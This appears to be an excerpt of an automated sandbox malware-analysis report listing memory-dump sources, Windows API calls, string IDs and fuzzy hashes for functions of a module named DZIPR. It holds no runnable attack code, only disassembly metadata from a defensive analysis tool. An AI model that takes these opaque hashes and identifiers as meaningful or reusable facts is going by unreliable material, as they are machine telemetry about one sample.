                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: 7a9de5a02955649691a2696c3337ccb7db3a9cfbc5317f754d2287594839f794
                          • Instruction ID: 071f5c277ab1c38e6cb6f635f6b034901f2210300e9ceaed4f6cbcd176d02701
                          • Opcode Fuzzy Hash: 7a9de5a02955649691a2696c3337ccb7db3a9cfbc5317f754d2287594839f794
                          • Instruction Fuzzy Hash: 14D02E365A8748AEDF108E719C08B223BFE97813A2F048431F80CC6180F9B4C0A18A04
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FA67498
                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FA676D5,?,00000000,?,00000000,00000104,00000000,?,6FA8BEF4,00000000), ref: 6FA674D6
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FA67546
                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FA6756D
                          • CharUpperW.USER32(00000000), ref: 6FA675A0
                          • FindFirstFileW.KERNEL32(?,?), ref: 6FA675BC
                          • FindClose.KERNEL32(00000000), ref: 6FA675C8
                          • lstrlenW.KERNEL32(?), ref: 6FA675E6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                          • String ID:
                          • API String ID: 624941980-0
                          • Opcode ID: 4f1a0569705df6164d42445e24f7c2703d1df86362c889036dd4b1fd36e2a402
                          • Instruction ID: 0aed8d9feaffb26d220323ac8550e7cb9e431a0ba44c8a507beacb40f9dff988
                          • Opcode Fuzzy Hash: 4f1a0569705df6164d42445e24f7c2703d1df86362c889036dd4b1fd36e2a402
                          • Instruction Fuzzy Hash: 8641A1709183159BDF25AF74CD8CBAE7B78AF02318F0442D9E82992190EF799AD5CF10
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 6FA77C6C
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FA77C81
                          • UnhandledExceptionFilter.KERNEL32(6FA8A4B8), ref: 6FA77C8C
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FA77CA8
                          • TerminateProcess.KERNEL32(00000000), ref: 6FA77CAF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 366a3618a74b9f487cf636d77decf6648249fb8a09d2ffb09cf7df79978ebc4e
                          • Instruction ID: 85c32e96780ee70ff072917959de742e934bda56bf3b4d249c8249c3df2f9fd5
                          • Opcode Fuzzy Hash: 366a3618a74b9f487cf636d77decf6648249fb8a09d2ffb09cf7df79978ebc4e
                          • Instruction Fuzzy Hash: 6F21C574426B049FDB41DF59C9466493BF8BB0B326F60806AE4188B390DFB655A38F41
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FA689FC
                          • __snwprintf_s.LIBCMT ref: 6FA68A2E
                          • LoadLibraryW.KERNEL32(?), ref: 6FA68A69
                            • Part of subcall function 6FA75348: __getptd_noexit.LIBCMT ref: 6FA75348
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                          • String ID: LOC
                          • API String ID: 3175857669-519433814
                          • Opcode ID: f62954e626acc4740bb413c0201f0b7db0a12abd1eea1e126596ff49f91b7383
                          • Instruction ID: 7fa5a94c95603809e7cb69263ae60ca9ebdcec40324fc024a57afb07c24e3b36
                          • Opcode Fuzzy Hash: f62954e626acc4740bb413c0201f0b7db0a12abd1eea1e126596ff49f91b7383
                          • Instruction Fuzzy Hash: 9011E779A65304AFDB21AB78CD54FBE77ACAF02358F050061A510A71D0DFBC99C08761
                          APIs
                            • Part of subcall function 6FA72C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA72C62
                          • GetKeyState.USER32(00000010), ref: 6FA70514
                          • GetKeyState.USER32(00000011), ref: 6FA7051D
                          • GetKeyState.USER32(00000012), ref: 6FA70526
                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FA7053C
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: State$LongMessageSendWindow
                          • String ID:
                          • API String ID: 1063413437-0
                          • Opcode ID: 84a7151a204a42505c6ea4e5754dbf21ed142f3b7af0bb6e8c8a935074c6abe6
                          • Instruction ID: 78c0b6eefb6d253b4ae1084aa20b0c73d89d98c1435414039991959bb351c116
                          • Opcode Fuzzy Hash: 84a7151a204a42505c6ea4e5754dbf21ed142f3b7af0bb6e8c8a935074c6abe6
                          • Instruction Fuzzy Hash: 3AF0B4397C078EA5EA3065744E01FE9062D8F81BA4F04D0327655AA1C0CFAAC5824660
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 91fdad101ce427703c0bb3646f7cbfa01ddef275d2f5f45756b322978ba823e6
                          • Instruction ID: d3aca6b7c5f52ddf36f2a867a9c2adc060439327c4418eea47686aceead9dfb6
                          • Opcode Fuzzy Hash: 91fdad101ce427703c0bb3646f7cbfa01ddef275d2f5f45756b322978ba823e6
                          • Instruction Fuzzy Hash: A2F03C31504209ABDF129FB5CD04AAE3B6AEF227D4F54C021F929D9050DF79DA91DB50
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9fc6bcfc5d32107f7e307bb79f8579f2259bf2e830f917530a63fa9d14b02e51
                          • Instruction ID: 3a5fcc4fad1ad98bdc126b8eabd3a247661df4cf5c17e193ae37c0d3676532ff
                          • Opcode Fuzzy Hash: 9fc6bcfc5d32107f7e307bb79f8579f2259bf2e830f917530a63fa9d14b02e51
                          • Instruction Fuzzy Hash: 0A316676A087058FCB24CF59C58062AB7E6FFC9714F5A886DE88857342DB34F895CB81
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FA68BE9
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA68EB7,?,?), ref: 6FA68C19
                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA68C2D
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C69
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C77
                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA68C94
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA68CBF
                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA68CC8
                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FA68CE1
                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FA68CFE
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA68D31
                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FA68D3A
                          • GetModuleFileNameW.KERNEL32(6FA60000,?,00000105), ref: 6FA68D7F
                          • _memset.LIBCMT ref: 6FA68D9F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                          • API String ID: 3537336938-2299501126
                          • Opcode ID: 1872732d5a5a8b04f1f556ea603fe86f90a6bcfe40e2fd5e04fd3194a4818c2e
                          • Instruction ID: 125e5665c51a1f4b12f8e0d17b2b026b796d692c64c9f19dc1df3ea68e69a39c
                          • Opcode Fuzzy Hash: 1872732d5a5a8b04f1f556ea603fe86f90a6bcfe40e2fd5e04fd3194a4818c2e
                          • Instruction Fuzzy Hash: 46515E75D052289ECB60DFA5DD887ADBBB8EF59314F0001DAA458E3280DB789EC1CF64
                          APIs
                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FA6DE36,?,?,?,?,?,?,?,6FA6FCC6,00000000,00000002,00000028), ref: 6FA6DCF9
                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FA6DD15
                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FA6DD2A
                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FA6DD3B
                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FA6DD4C
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FA6DD5D
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FA6DD6E
                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FA6DD8E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                          • API String ID: 667068680-2451437823
                          • Opcode ID: 1e3115f31e82d58856fa433deebf71372d5d696fb8b612b6e797ebf2ee647396
                          • Instruction ID: a37f14113d83245d94e6db8b41c74bfa9d10aedb833ad242b17b6257a852743e
                          • Opcode Fuzzy Hash: 1e3115f31e82d58856fa433deebf71372d5d696fb8b612b6e797ebf2ee647396
                          • Instruction Fuzzy Hash: 45213E72825B629F8B007F75C9C486A7AE5B74FA65324C53FD435D7108DBBA10D2CB20
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FA719B8
                            • Part of subcall function 6FA6C050: __EH_prolog3.LIBCMT ref: 6FA6C057
                          • CallNextHookEx.USER32(?,?,?,?), ref: 6FA719F8
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          • _memset.LIBCMT ref: 6FA71A51
                          • GetClassLongW.USER32(?,000000E0), ref: 6FA71A85
                          • SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FA71ADA
                          • GetClassNameW.USER32(?,?,00000100), ref: 6FA71B20
                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA71B46
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA71B5D
                          • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FA71B6F
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA71B77
                          • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA71B86
                          • SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FA71B94
                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 6FA71BA6
                          • UnhookWindowsHookEx.USER32(?), ref: 6FA71BBA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
                          • String ID: #32768$AfxOldWndProc423
                          • API String ID: 4265692241-2141921550
                          • Opcode ID: c11398b7f79baf27b153b425aa0592505c4ec0aabcda6d04159d9223ac8f6f1f
                          • Instruction ID: 73e582b942ae22bbc24cce7517bdfc72b1c0cced8c00cfd81b9721c128c0bb9a
                          • Opcode Fuzzy Hash: c11398b7f79baf27b153b425aa0592505c4ec0aabcda6d04159d9223ac8f6f1f
                          • Instruction Fuzzy Hash: D051E539500725ABCB31AF24CD58FEA7BB8FF05762F044195F41996280EF389AD1CBA0
                          APIs
                            • Part of subcall function 6FA72C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA72C62
                          • GetParent.USER32(?), ref: 6FA6FC05
                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FA6FC28
                          • GetWindowRect.USER32(?,?), ref: 6FA6FC42
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FA6FC58
                          • CopyRect.USER32(?,?), ref: 6FA6FCA5
                          • CopyRect.USER32(?,?), ref: 6FA6FCAF
                          • GetWindowRect.USER32(00000000,?), ref: 6FA6FCB8
                            • Part of subcall function 6FA6DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA6DED6
                          • CopyRect.USER32(?,?), ref: 6FA6FCD4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                          • String ID: (
                          • API String ID: 1385303425-3887548279
                          • Opcode ID: d1f73d2da25cd741c92447a6a25010590c2666d5b135457527152990a5dc240f
                          • Instruction ID: 991dcb01db84377c21b0b81567d04befac093d2bcbc724354bacbefb25786581
                          • Opcode Fuzzy Hash: d1f73d2da25cd741c92447a6a25010590c2666d5b135457527152990a5dc240f
                          • Instruction Fuzzy Hash: 3F514F72904619ABDB00CBA8CD85EEEBBB9FF49314F194119F915F7280EB74E941CB90
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FA8E928,0000000C,6FA7A25A,00000000,00000000), ref: 6FA7A131
                          • __crt_waiting_on_module_handle.LIBCMT ref: 6FA7A13C
                            • Part of subcall function 6FA75BCF: Sleep.KERNEL32(000003E8,00000000,?,6FA7A082,KERNEL32.DLL,?,6FA7A0CE), ref: 6FA75BDB
                            • Part of subcall function 6FA75BCF: GetModuleHandleW.KERNEL32(6FA8C168,?,6FA7A082,KERNEL32.DLL,?,6FA7A0CE), ref: 6FA75BE4
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FA7A165
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 6FA7A175
                          • __lock.LIBCMT ref: 6FA7A197
                          • InterlockedIncrement.KERNEL32(6FA68ADA), ref: 6FA7A1A4
                          • __lock.LIBCMT ref: 6FA7A1B8
                          • ___addlocaleref.LIBCMT ref: 6FA7A1D6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1028249917-2843748187
                          • Opcode ID: 0193dbd010af3a4935f87d587ba7adf93adc99dec7e99a0f5cb12c9965729b73
                          • Instruction ID: 07d4ef4b8d38b591ac8a5fed201f8102e7e0d154ca281178e1d9a4e9ce230652
                          • Opcode Fuzzy Hash: 0193dbd010af3a4935f87d587ba7adf93adc99dec7e99a0f5cb12c9965729b73
                          • Instruction Fuzzy Hash: 45116075805B01AEEB209F79C900F5ABBE1AF45328F108559D4A9972E0DFBCA5C1CB54
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FA68503
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA68520
                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FA6852D
                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FA6853A
                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FA68547
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 667068680-2424895508
                          • Opcode ID: 300610a1e190a432a08e9408713297e30047fa9ab35d8f281edb0a58ea11f9ea
                          • Instruction ID: feff7f3a919d8b3cd8320680d96ebd54118ab1ce28efffd564388aeee93a0ef7
                          • Opcode Fuzzy Hash: 300610a1e190a432a08e9408713297e30047fa9ab35d8f281edb0a58ea11f9ea
                          • Instruction Fuzzy Hash: E11194B181D752AFCF109FA5898A406BFBCAF57324308803FE15E87240DEB994D1CB15
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32,6FA6A6B6), ref: 6FA6A5AA
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA6A5CB
                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA6A5DD
                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA6A5EF
                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA6A601
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 417325364-2424895508
                          • Opcode ID: 0cb9cdb4e4c0c80a0cafeebfca5511a91d21e0e93c591ab9bc25cff1e028cdbf
                          • Instruction ID: 06f7e03d5a4265888cfd98deaad2a3d80de17bc70e7f7dec9ad6e6f4ed24e462
                          • Opcode Fuzzy Hash: 0cb9cdb4e4c0c80a0cafeebfca5511a91d21e0e93c591ab9bc25cff1e028cdbf
                          • Instruction Fuzzy Hash: CEF09E7D869B75AFCF415FB198055057F7DBB17279700C43AA85893200DFBA90A6CF41
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 6FA71868
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA71877
                          • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FA718D1
                            • Part of subcall function 6FA70C2C: GetWindowRect.USER32(?,10000000), ref: 6FA70C56
                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FA718F8
                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FA71900
                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA71907
                          • GlobalDeleteAtom.KERNEL32(?), ref: 6FA71911
                          • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FA71965
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
